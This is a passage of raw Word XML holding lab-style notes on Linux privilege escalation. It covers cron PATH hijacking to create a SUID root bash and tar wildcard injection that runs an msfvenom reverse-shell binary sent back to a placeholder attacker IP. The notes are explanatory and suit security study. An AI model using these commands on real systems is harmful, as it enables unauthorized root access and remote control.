    <w:p w14:paraId="56F9A9AE" w14:textId="23CC3DED" w:rsidR="00F41586" w:rsidRPr="0084205E" w:rsidRDefault="00F41586" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>cat /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/crontab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7079D2" w14:textId="62B44238" w:rsidR="00F41586" w:rsidRPr="0084205E" w:rsidRDefault="00F41586" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>note PATH variable starts with /home/user/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385D58ED" w14:textId="67E5F546" w:rsidR="00F137D5" w:rsidRPr="0084205E" w:rsidRDefault="00F137D5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>/home/user:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067D7205" w14:textId="0FBF7DC1" w:rsidR="00F137D5" w:rsidRPr="0084205E" w:rsidRDefault="00F137D5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>create file of same name in home directory with bash shell script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A1EB0FA" w14:textId="77777777" w:rsidR="00F137D5" w:rsidRPr="0084205E" w:rsidRDefault="00F137D5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>#!/</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="567815E0" w14:textId="77777777" w:rsidR="00F137D5" w:rsidRPr="0084205E" w:rsidRDefault="00F137D5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57EC0EE9" w14:textId="77777777" w:rsidR="00F137D5" w:rsidRPr="0084205E" w:rsidRDefault="00F137D5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>cp /bin/bash /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>rootbash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="40481913" w14:textId="551EA31F" w:rsidR="00F137D5" w:rsidRPr="0084205E" w:rsidRDefault="00F137D5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>chmod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> +</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>xs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>rootbash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1364B7FA" w14:textId="7865EE4A" w:rsidR="00F137D5" w:rsidRPr="0084205E" w:rsidRDefault="00F137D5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>chmod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> +x /home/user/overwrite.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79738EA8" w14:textId="1B880FEC" w:rsidR="00F137D5" w:rsidRPr="0084205E" w:rsidRDefault="00F137D5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>wait for cronjob to run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD78ABA" w14:textId="53E0B7A5" w:rsidR="00F137D5" w:rsidRPr="0084205E" w:rsidRDefault="00F137D5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>then run /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>rootbash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> command with -p to gain shell running with root privileges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF218E5" w14:textId="26A50E7F" w:rsidR="00F137D5" w:rsidRPr="0084205E" w:rsidRDefault="00F137D5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>rootbash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -p</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2529D91B" w14:textId="18AA7200" w:rsidR="00F137D5" w:rsidRPr="0084205E" w:rsidRDefault="00F137D5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE42006" w14:textId="3A2C3C7D" w:rsidR="00F137D5" w:rsidRPr="0084205E" w:rsidRDefault="00F137D5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>to remove</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E195230" w14:textId="76864702" w:rsidR="00F137D5" w:rsidRPr="0084205E" w:rsidRDefault="00F137D5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>rm /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>rootbash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="185F044D" w14:textId="7BFF7A22" w:rsidR="00F137D5" w:rsidRPr="0084205E" w:rsidRDefault="00F137D5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12FD6649" w14:textId="53BC4B59" w:rsidR="00F137D5" w:rsidRPr="0084205E" w:rsidRDefault="00F137D5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Cron Jobs – Wildcards</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42302EE4" w14:textId="259768EB" w:rsidR="00F137D5" w:rsidRPr="0084205E" w:rsidRDefault="00991C21" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>view contents of job script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA0D564" w14:textId="34400AA9" w:rsidR="00991C21" w:rsidRPr="0084205E" w:rsidRDefault="00991C21" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>cat /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/local/bin/&lt;filename&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E5C07A" w14:textId="5E6C448D" w:rsidR="00991C21" w:rsidRPr="0084205E" w:rsidRDefault="00991C21" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>command running with * wildcard</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8EAE4F" w14:textId="654A7025" w:rsidR="00991C21" w:rsidRPr="0084205E" w:rsidRDefault="00991C21" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>GTFOBins</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> for tar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73BD392B" w14:textId="6B8D177F" w:rsidR="00991C21" w:rsidRPr="0084205E" w:rsidRDefault="00991C21" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>tar has command line options that let other commands run as a checkpoint feature</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ECB62F7" w14:textId="4CD694FE" w:rsidR="00991C21" w:rsidRPr="0084205E" w:rsidRDefault="00991C21" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> to generate reverse shell ELF binary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F1EAB1D" w14:textId="479FA55B" w:rsidR="00991C21" w:rsidRPr="0084205E" w:rsidRDefault="00991C21" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -p </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/x64/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>shell_reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> LHOST=&lt;attacker </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">&gt; LPORT=4444 -f elf -o </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>shell.elf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="529772D8" w14:textId="7DD60582" w:rsidR="00991C21" w:rsidRPr="0084205E" w:rsidRDefault="00991C21" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">host, pull from attacker, and set permissions </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>chmod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> +x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="169E3BB9" w14:textId="2E979709" w:rsidR="000432B8" w:rsidRPr="0084205E" w:rsidRDefault="000432B8" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>create two additional files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51BAB4DC" w14:textId="77777777" w:rsidR="000432B8" w:rsidRPr="0084205E" w:rsidRDefault="000432B8" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>touch /home/user/--checkpoint=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0889F7A2" w14:textId="1502DA84" w:rsidR="000432B8" w:rsidRPr="0084205E" w:rsidRDefault="000432B8" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>touch /home/user/--checkpoint-action=exec=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>shell.elf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2985BEAB" w14:textId="60B2216C" w:rsidR="000432B8" w:rsidRPr="0084205E" w:rsidRDefault="000432B8" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">when tar command in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>cron</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> job runs, wildcard will expand to include these files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB91343" w14:textId="2148BB12" w:rsidR="000432B8" w:rsidRPr="0084205E" w:rsidRDefault="000432B8" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>as filenames are legal tar command line options, tar will recognize them and run them</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E3D6246" w14:textId="429F1078" w:rsidR="000432B8" w:rsidRPr="0084205E" w:rsidRDefault="000432B8" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>setup netcat listener</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B47A189" w14:textId="2C4239A4" w:rsidR="000432B8" w:rsidRPr="0084205E" w:rsidRDefault="000432B8" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>to remove</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028074ED" w14:textId="77777777" w:rsidR="000432B8" w:rsidRPr="0084205E" w:rsidRDefault="000432B8" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>rm /home/user/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>shell.elf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="15124B04" w14:textId="77777777" w:rsidR="000432B8" w:rsidRPr="0084205E" w:rsidRDefault="000432B8" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>rm /home/user/--checkpoint=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03AA1DDA" w14:textId="6DBDA775" w:rsidR="000432B8" w:rsidRPr="0084205E" w:rsidRDefault="000432B8" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>rm /home/user/--checkpoint-action=exec=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>shell.elf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1FCE1909" w14:textId="41EC3D2D" w:rsidR="000432B8" w:rsidRPr="0084205E" w:rsidRDefault="000432B8" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>SUID/GUID Executables – Known Exploits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF3C4EF" w14:textId="24F687AB" w:rsidR="000432B8" w:rsidRPr="0084205E" w:rsidRDefault="00540179" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Find all the SUID/SGID executables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20BF7920" w14:textId="5C866E69" w:rsidR="00540179" w:rsidRPr="0084205E" w:rsidRDefault="00540179" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">find / -type f -a </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>\( -</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>perm -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>u+s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -o -perm -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
